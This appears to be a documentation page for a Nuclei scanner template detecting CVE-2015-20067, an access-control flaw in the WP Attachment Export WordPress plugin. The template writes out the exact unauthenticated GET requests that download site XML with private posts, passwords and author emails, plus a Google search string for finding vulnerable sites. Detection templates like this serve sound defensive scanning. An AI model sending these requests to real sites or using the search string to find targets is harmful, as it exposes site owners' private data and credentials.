WP Attachment Export < 0.2.4 - Unrestricted File Download
ID: CVE-2015-20067
Severity: high
Author: r3Y3r53
Tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wp_attachment_export_project
Description
Section titled “Description”The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpresspowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
YAML Source
Section titled “YAML Source”id: CVE-2015-20067
info: name: WP Attachment Export < 0.2.4 - Unrestricted File Download author: r3Y3r53 severity: high description: | The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text. remediation: Fixed in 0.2.4 reference: - https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a - https://packetstormsecurity.com/files/132693/ - https://seclists.org/fulldisclosure/2015/Jul/73 - https://nvd.nist.gov/vuln/detail/CVE-2015-20067 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-20067 cwe-id: CWE-862 epss-score: 0.07226 epss-percentile: 0.93884 cpe: cpe:2.3:a:wp_attachment_export_project:wp_attachment_export:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: wp_attachment_export_project product: wp_attachment_export framework: wordpress google-query: inurl:"/wp-content/plugins/wp-attachment-export/" tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wp_attachment_export_project
http: - method: GET path: - "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true" - "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"
stop-at-first-match: true matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/xml")' - 'contains_all(body, "title","wp:author_id","wp:author_email")' condition: and# digest: 4b0a00483046022100801bd220dbcfffe329ac8176ff2fc90e7d55310a78148567716a957ba2d16607022100cf0ebc6286d1bdf42ce78b44cb101f5480efe327cc04e67e2c7511daa085910c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-20067.yaml"